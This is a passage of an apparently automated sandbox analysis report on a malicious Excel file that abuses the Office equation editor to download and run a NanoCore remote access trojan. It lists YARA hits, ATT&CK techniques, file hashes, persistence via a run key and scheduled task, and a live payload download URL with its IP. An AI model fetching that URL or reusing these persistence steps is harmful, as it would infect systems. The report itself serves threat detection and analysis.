luginClientPlugin.dll
        Source: smtpsvc.exe, 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: smtpsvc.exe, 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: smtpsvc.exe, 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY
        Source: Yara matchFile source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection112Masquerading112Input Capture11Security Software Discovery21Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothRemote Access Software1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol122Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information21DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344209 Sample: PO-FRE590164.xlsx Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 48 127.0.0.1:4009 unknown unknown 2->48 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 Multi AV Scanner detection for dropped file 2->64 66 20 other signatures 2->66 8 EQNEDT32.EXE 12 2->8         started        13 smtpsvc.exe 2 2->13         started        15 EXCEL.EXE 37 19 2->15         started        signatures3 process4 dnsIp5 50 nop.myq-see.com 198.23.207.63, 49165, 80 AS-COLOCROSSINGUS United States 8->50 38 C:\Users\user\AppData\Local\...\Vbb[1].exe, PE32 8->38 dropped 40 C:\Users\Public\vbc.exe, PE32 8->40 dropped 68 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->68 17 vbc.exe 3 8->17         started        70 Injects a PE file into a foreign processes 13->70 21 smtpsvc.exe 13->21         started        23 schtasks.exe 13->23         started        42 C:\Users\user\Desktop\~$PO-FRE590164.xlsx, data 15->42 dropped file6 signatures7 process8 file9 34 C:\Users\user\AppData\Roaming\TrXHdHpWh.exe, PE32 17->34 dropped 36 C:\Users\user\AppData\Local\...\tmpD9BD.tmp, XML 17->36 dropped 54 Multi AV Scanner detection for dropped file 17->54 56 Machine Learning detection for dropped file 17->56 58 Injects a PE file into a foreign processes 17->58 25 vbc.exe 1 6 17->25         started        30 schtasks.exe 17->30         started        32 vbc.exe 17->32         started        signatures10 process11 dnsIp12 52 127.0.0.1 unknown unknown 25->52 44 C:\Program Files (x86)\...\smtpsvc.exe, PE32 25->44 dropped 46 C:\Users\user\AppData\Roaming\...\run.dat, data 25->46 dropped 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->72 file13 signatures14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PO-FRE590164.xlsx34%VirustotalBrowse
        PO-FRE590164.xlsx24%ReversingLabsDocument-Office.Exploit.Heuristic

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe100%Joe Sandbox ML
        C:\Users\Public\vbc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\TrXHdHpWh.exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe35%VirustotalBrowse
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe35%VirustotalBrowse
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        C:\Users\user\AppData\Roaming\TrXHdHpWh.exe35%VirustotalBrowse
        C:\Users\user\AppData\Roaming\TrXHdHpWh.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
        C:\Users\Public\vbc.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        8.2.vbc.exe.530000.3.unpack100%AviraTR/NanoCore.fadteDownload File
        8.2.vbc.exe.400000.1.unpack100%AviraTR/Dropper.GenDownload File
        12.2.smtpsvc.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        nop.myq-see.com
        198.23.207.63
        truefalse
          high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://nop.myq-see.com/win/Vbb.exefalse
            high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.%s.comPAvbc.exe, 00000004.00000002.2175017889.0000000005150000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2382084526.0000000005280000.00000002.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2208244482.0000000005290000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            low
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2175017889.0000000005150000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2382084526.0000000005280000.00000002.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2208244482.0000000005290000.00000002.00000001.sdmpfalse
              high
              http://www.day.com/dam/1.0F36B41B0.emf.0.drfalse
                high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  198.23.207.63
                  unknownUnited States
                  36352AS-COLOCROSSINGUSfalse

                  Private

                  IP
                  127.0.0.1
                  127.0.0.1:4009

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:344209
                  Start date:26.01.2021
                  Start time:09:17:36
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 10m 54s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:PO-FRE590164.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:13
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winXLSX@15/11@2/3
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 1% (good quality ratio 1%)
                  • Quality average: 57.8%
                  • Quality standard deviation: 18.4%
                  HCA Information:
                  • Successful, ratio: 89%
                  • Number of executed functions: 115
                  • Number of non-executed functions: 2
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  09:22:12API Interceptor72x Sleep call for process: EQNEDT32.EXE modified
                  09:22:16API Interceptor1109x Sleep call for process: vbc.exe modified
                  09:22:18API Interceptor2x Sleep call for process: schtasks.exe modified
                  09:22:23AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                  09:22:33API Interceptor81x Sleep call for process: smtpsvc.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  AS-COLOCROSSINGUSJBz_shellcode - variant2.ps1Get hashmaliciousBrowse
                  • 107.175.49.49
                  left.ps1Get hashmaliciousBrowse
                  • 107.175.49.49
                  DHL-ADDRESS.xlsxGet hashmaliciousBrowse
                  • 198.144.176.146
                  RFQ 2027376.xlsxGet hashmaliciousBrowse
                  • 107.172.130.131
                  QtEQhJpxAt.exeGet hashmaliciousBrowse
                  • 198.46.134.245
                  Order confirmation.xlsxGet hashmaliciousBrowse
                  • 107.175.1.164
                  LRGjZ3F0AO.exeGet hashmaliciousBrowse
                  • 154.16.112.101
                  ORDER#9494.exeGet hashmaliciousBrowse
                  • 107.174.65.139
                  T7gzTHDZ7g.rtfGet hashmaliciousBrowse
                  • 192.3.22.59
                  PO AR483-1590436 _ J-3000 PROJT.xlsxGet hashmaliciousBrowse
                  • 192.3.22.59
                  SpreadSheets.exeGet hashmaliciousBrowse
                  • 107.172.188.113
                  dg9PJ79P3G.exeGet hashmaliciousBrowse
                  • 154.16.112.101
                  XT-074321.xlsxGet hashmaliciousBrowse
                  • 192.3.22.40
                  payment issue.xlsxGet hashmaliciousBrowse
                  • 198.144.176.146
                  6VEoBuy32f.xlsGet hashmaliciousBrowse
                  • 192.3.2.50
                  6VEoBuy32f.xlsGet hashmaliciousBrowse
                  • 192.3.2.50
                  Photo-064-2021.jpg.exeGet hashmaliciousBrowse
                  • 198.23.172.50
                  sample5.exeGet hashmaliciousBrowse
                  • 192.3.247.123
                  QN-03507-20.exeGet hashmaliciousBrowse
                  • 23.95.82.66
                  fatHvt8YhT.exeGet hashmaliciousBrowse
                  • 154.16.112.101

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):781824
                  Entropy (8bit):6.923780842614681
                  Encrypted:false
                  SSDEEP:6144:pQj+CfD1Wb4XogN1uFxjWa2dAdo6IW8bqDchIyDINbtxMOlBRE0ffLjVqE6kXI2i:uC4V1tdA8bqwhBAtNdE0XvVH6kS
                  MD5:81956BB4F67D790E13CFD18F4CDD779B
                  SHA1:0BF781A6C1434D789F963D5DC76FDEAE28CB01B4
                  SHA-256:F2B321A162040B2990FE549349F00C9A60C2827EA0E82486F9C2C785D14D1462
                  SHA-512:A6EFB7CD565B2DA0811A79C8EEAB2D4DC470296A7ECCB4BADB21DDAF1ADD94EF3F2F02E2223212A19564137B08919434D65E8BE99F1779E9DD475EB11443E9D7
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 35%, Browse
                  • Antivirus: ReversingLabs, Detection: 26%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..T...........r... ........... .......................@............@.................................lr..O.......P.................... ....................................................... ............... ..H............text....R... ...T.................. ..`.rsrc...P............V..............@..@.reloc....... ......................@..B.................r......H...........d...........D...(.............................................(....*&..(.....*.s.........s.........s ........s!........s"........*...0...........~....o#....+..*.0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*&..((....*...0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....rE..p~....o-...(......t$....+..*...0..<........~.....().....,!
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:downloaded
                  Size (bytes):781824
                  Entropy (8bit):6.923780842614681
                  Encrypted:false
                  SSDEEP:6144:pQj+CfD1Wb4XogN1uFxjWa2dAdo6IW8bqDchIyDINbtxMOlBRE0ffLjVqE6kXI2i:uC4V1tdA8bqwhBAtNdE0XvVH6kS
                  MD5:81956BB4F67D790E13CFD18F4CDD779B
                  SHA1:0BF781A6C1434D789F963D5DC76FDEAE28CB01B4
                  SHA-256:F2B321A162040B2990FE549349F00C9A60C2827EA0E82486F9C2C785D14D1462
                  SHA-512:A6EFB7CD565B2DA0811A79C8EEAB2D4DC470296A7ECCB4BADB21DDAF1ADD94EF3F2F02E2223212A19564137B08919434D65E8BE99F1779E9DD475EB11443E9D7
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 35%, Browse
                  • Antivirus: ReversingLabs, Detection: 26%
                  Reputation:low
                  IE Cache URL:http://nop.myq-see.com/win/Vbb.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..T...........r... ........... .......................@............@.................................lr..O.......P.................... ....................................................... ............... ..H............text....R... ...T.................. ..`.rsrc...P............V..............@..@.reloc....... ......................@..B.................r......H...........d...........D...(.............................................(....*&..(.....*.s.........s.........s ........s!........s"........*...0...........~....o#....+..*.0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*&..((....*...0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....rE..p~....o-...(......t$....+..*...0..<........~.....().....,!
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C03033E.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                  Category:dropped
                  Size (bytes):48770
                  Entropy (8bit):7.801842363879827
                  Encrypted:false
                  SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                  MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                  SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                  SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                  SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82CE75F1.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                  Category:dropped
                  Size (bytes):48770
                  Entropy (8bit):7.801842363879827
                  Encrypted:false
                  SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                  MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                  SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                  SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                  SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F36B41B0.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):653280
                  Entropy (8bit):2.898628235657604
                  Encrypted:false
                  SSDEEP:3072:w34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:K4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                  MD5:0594E950F00AB466B2A05B146D951453
                  SHA1:FC7CC4FC175ECE7624E509A71430EE039F0618E5
                  SHA-256:9E3B7B5829BBF25CFF23933EF5B33486C6EA0A4C7E333B95E537133EB8642A9D
                  SHA-512:6034AD75CD774A6FE6DD7D576BB8B0D2F61C50645FA414C75AE66657B5CE39ADF9E83ED9C7AB74D777EA16423E73C9767D088F6D540A15B096450F1A7FA3B4D4
                  Malicious:false
                  Reputation:low
                  Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................<........N.T<...4........... ....N.T<...4... ....y.R4...<... ............z.R............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...4...h....2.R.................{.R............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                  C:\Users\user\AppData\Local\Temp\tmp1334.tmp
                  Process:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1621
                  Entropy (8bit):5.151107311230064
                  Encrypted:false
                  SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB8tn:cbhZ7ClNQi/rydbz9I3YODOLNdq3Q
                  MD5:ECA83CBF84253F3E85A8DD8C950B1753
                  SHA1:8B9A7096DEF5BE86B41E03A825561245316B6E93
                  SHA-256:0820EC278593650C26445DD9FB62BB4599EE0E90351F23685C011E4C5B71216E
                  SHA-512:74A17262ADB7E3312CF05AF7CD6ECB40759F6B5F92228ECEB9CAD3AB34B440849A8DF42FEA6FC1366E3AF466A962FDE8D8B2FC9F5A9D8BE27497ECF4D505FBFF
                  Malicious:false
                  Reputation:low
                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                  C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp
                  Process:C:\Users\Public\vbc.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1621
                  Entropy (8bit):5.151107311230064
                  Encrypted:false
                  SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB8tn:cbhZ7ClNQi/rydbz9I3YODOLNdq3Q
                  MD5:ECA83CBF84253F3E85A8DD8C950B1753
                  SHA1:8B9A7096DEF5BE86B41E03A825561245316B6E93
                  SHA-256:0820EC278593650C26445DD9FB62BB4599EE0E90351F23685C011E4C5B71216E
                  SHA-512:74A17262ADB7E3312CF05AF7CD6ECB40759F6B5F92228ECEB9CAD3AB34B440849A8DF42FEA6FC1366E3AF466A962FDE8D8B2FC9F5A9D8BE27497ECF4D505FBFF
                  Malicious:true
                  Reputation:low
